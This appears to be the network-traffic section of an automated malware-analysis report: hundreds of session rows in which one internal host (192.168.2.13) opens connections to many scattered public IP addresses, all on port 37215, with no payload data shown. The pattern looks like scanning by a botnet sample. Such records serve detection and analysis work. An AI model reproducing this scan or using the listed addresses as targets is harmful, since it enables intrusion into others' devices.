                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16687192.168.2.135084241.147.182.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16688192.168.2.1340868141.74.181.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16689192.168.2.133463450.118.68.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16690192.168.2.1353644197.40.35.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16691192.168.2.13456981.135.174.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16692192.168.2.136092241.168.176.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16693192.168.2.1335744197.32.85.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16694192.168.2.1357702197.253.71.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16695192.168.2.1355792157.35.124.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16696192.168.2.134268041.96.205.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16697192.168.2.1355252197.76.237.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16698192.168.2.1345514197.211.86.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16699192.168.2.135410241.133.42.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16700192.168.2.1356560197.36.103.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16701192.168.2.133944841.7.207.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16702192.168.2.1343762157.186.149.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16703192.168.2.1358812197.0.181.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16704192.168.2.134473641.118.229.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16705192.168.2.136043841.158.165.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16706192.168.2.133800023.118.190.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16707192.168.2.1351178157.79.19.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16708192.168.2.1349180197.55.92.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16709192.168.2.135918841.23.234.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16710192.168.2.1337020197.146.166.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16711192.168.2.1335098197.170.84.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16712192.168.2.1338260157.79.248.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16713192.168.2.1349226197.79.251.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16714192.168.2.134588247.51.202.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16715192.168.2.1343328197.211.58.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16716192.168.2.1336364157.235.45.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16717192.168.2.135876641.211.27.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16718192.168.2.1356336157.157.138.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16719192.168.2.1357770197.125.171.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16720192.168.2.1351822157.92.146.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16721192.168.2.135289841.246.221.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16722192.168.2.135602241.3.75.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16723192.168.2.133636841.62.131.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16724192.168.2.1356488157.251.174.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16725192.168.2.1356750197.63.225.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16726192.168.2.136062041.191.115.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16727192.168.2.1346858197.82.166.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16728192.168.2.133717241.38.131.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16729192.168.2.1337660221.255.200.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16730192.168.2.134060841.160.31.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16731192.168.2.135756841.204.230.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16732192.168.2.134351067.218.33.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16733192.168.2.134856041.65.80.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16734192.168.2.1340286100.36.138.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16735192.168.2.1354104197.58.74.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16736192.168.2.1353552197.229.178.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16737192.168.2.135224639.90.34.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16738192.168.2.135039041.218.67.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16739192.168.2.1350900197.109.220.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16740192.168.2.135642041.18.250.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16741192.168.2.1336454197.131.127.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16742192.168.2.1342046197.47.121.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16743192.168.2.1355656195.111.115.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16744192.168.2.1356774197.189.60.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16745192.168.2.1348144157.203.14.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16746192.168.2.134029841.60.128.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16747192.168.2.134237241.232.76.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16748192.168.2.133445650.186.115.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16749192.168.2.1340272197.139.115.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16750192.168.2.135680441.115.10.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16751192.168.2.134722841.157.245.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16752192.168.2.1354514157.249.161.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16753192.168.2.1339484157.169.144.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16754192.168.2.1349834197.181.137.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16755192.168.2.1339114197.80.157.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16756192.168.2.1349440157.101.196.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16757192.168.2.135315241.171.220.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16758192.168.2.133475641.138.74.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16759192.168.2.1339676157.5.61.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16760192.168.2.134149841.69.253.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16761192.168.2.1355178157.216.131.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16762192.168.2.133968241.239.218.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16763192.168.2.135897241.221.111.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16764192.168.2.135764241.213.190.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16765192.168.2.134690041.182.35.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16766192.168.2.1357290197.245.60.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16767192.168.2.1333584157.222.12.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16768192.168.2.1338770197.127.90.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16769192.168.2.1341224197.119.105.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16770192.168.2.1347980157.190.32.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16771192.168.2.1336162157.201.4.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16772192.168.2.1334922197.40.143.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16773192.168.2.1348528198.201.160.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16774192.168.2.1355892197.157.38.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16775192.168.2.1360090197.204.170.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16776192.168.2.135306241.110.76.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16777192.168.2.133456641.201.57.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16778192.168.2.135135041.79.44.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16779192.168.2.134527241.253.223.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16780192.168.2.1338296222.129.85.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16781192.168.2.1353754202.213.144.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16782192.168.2.1344026157.141.60.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16783192.168.2.135256641.162.214.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16784192.168.2.135494041.66.247.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16785192.168.2.1335000197.17.99.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16786192.168.2.1344990157.183.191.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16787192.168.2.1347074157.58.218.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16788192.168.2.1335176102.215.36.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16789192.168.2.1334820157.252.134.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16790192.168.2.133955496.162.83.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16791192.168.2.134463681.92.135.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16792192.168.2.135223441.75.2.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16793192.168.2.135976041.113.18.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16794192.168.2.135581478.77.186.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16795192.168.2.1350902161.55.68.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16796192.168.2.1337252157.220.78.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16797192.168.2.133331641.156.30.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16798192.168.2.1356410197.4.33.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16799192.168.2.1348772157.209.201.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16800192.168.2.1340982125.127.221.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16801192.168.2.133421641.218.193.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16802192.168.2.135221213.8.59.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16803192.168.2.1342344170.143.69.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16804192.168.2.1342358157.207.66.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16805192.168.2.1353302157.95.42.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16806192.168.2.1336854197.42.172.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16807192.168.2.135839041.124.155.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16808192.168.2.1343088157.142.250.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16809192.168.2.1341320203.254.138.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16810192.168.2.1347456157.9.159.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16811192.168.2.1352390134.164.15.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16812192.168.2.1334338197.17.26.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16813192.168.2.1341672157.15.205.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16814192.168.2.1335790197.254.40.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16815192.168.2.134359041.113.69.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16816192.168.2.134198641.163.33.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16817192.168.2.1355930165.196.124.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16818192.168.2.1360302157.211.44.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16819192.168.2.134618641.82.76.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16820192.168.2.133807841.36.134.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16821192.168.2.1348940197.123.75.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16822192.168.2.1337774197.45.48.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16823192.168.2.13419622.66.117.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16824192.168.2.1336248157.16.49.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16825192.168.2.1344628157.165.192.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16826192.168.2.134775441.207.109.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16827192.168.2.133520441.50.162.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16828192.168.2.1357382137.252.116.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16829192.168.2.1348804197.39.227.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16830192.168.2.135263675.31.219.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16831192.168.2.1339138125.224.251.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16832192.168.2.1350250197.17.225.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16833192.168.2.135140241.76.185.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16834192.168.2.1333786157.135.233.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16835192.168.2.1346842157.17.208.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16836192.168.2.1358080197.158.81.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16837192.168.2.1356932157.92.231.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16838192.168.2.1340424178.159.128.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16839192.168.2.134588623.99.146.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16840192.168.2.1332768197.142.244.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16841192.168.2.134449841.156.119.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16842192.168.2.1340814157.110.237.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16843192.168.2.134022841.243.60.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16844192.168.2.133798841.21.91.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16845192.168.2.1350160157.191.159.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16846192.168.2.134444241.49.31.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16847192.168.2.1357124159.210.69.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16848192.168.2.1336694197.252.135.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16849192.168.2.1342924197.70.49.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16850192.168.2.1357410157.188.243.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16851192.168.2.1351890212.235.186.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16852192.168.2.1351812197.8.163.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16853192.168.2.1337586197.57.107.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16854192.168.2.135522876.157.41.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16855192.168.2.1332888197.181.7.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16856192.168.2.1342848197.141.201.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16857192.168.2.1346340197.214.229.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16858192.168.2.135875441.27.188.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16859192.168.2.1337078157.242.158.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16860192.168.2.1333990157.227.227.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16861192.168.2.133801041.53.33.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16862192.168.2.1345178157.106.171.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16863192.168.2.135171241.138.62.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16864192.168.2.135840057.131.52.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16865192.168.2.1350286157.169.85.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16866192.168.2.1351916197.63.109.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16867192.168.2.135429241.202.30.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16868192.168.2.1336076157.204.210.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16869192.168.2.134341641.3.253.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16870192.168.2.1350118157.172.83.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16871192.168.2.134712841.55.109.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16872192.168.2.1353784182.254.210.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16873192.168.2.1347662162.22.110.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16874192.168.2.1340584157.178.31.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16875192.168.2.1346672157.174.169.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16876192.168.2.134595498.186.202.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16877192.168.2.1356082157.83.91.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16878192.168.2.1355070197.65.103.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16879192.168.2.1339984136.45.169.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16880192.168.2.135688241.51.218.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16881192.168.2.1359016157.69.37.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16882192.168.2.1348036197.53.138.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16883192.168.2.1359740157.41.235.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16884192.168.2.1337172197.166.229.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16885192.168.2.1347546197.64.74.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16886192.168.2.1343654135.45.94.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16887192.168.2.1346554197.14.70.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16888192.168.2.1336476176.193.148.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16889192.168.2.1337520197.3.95.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16890192.168.2.135635894.216.10.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16891192.168.2.1342484157.9.236.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16892192.168.2.135312641.180.221.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16893192.168.2.1354412157.58.93.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16894192.168.2.1345966157.241.42.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16895192.168.2.133379241.176.190.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
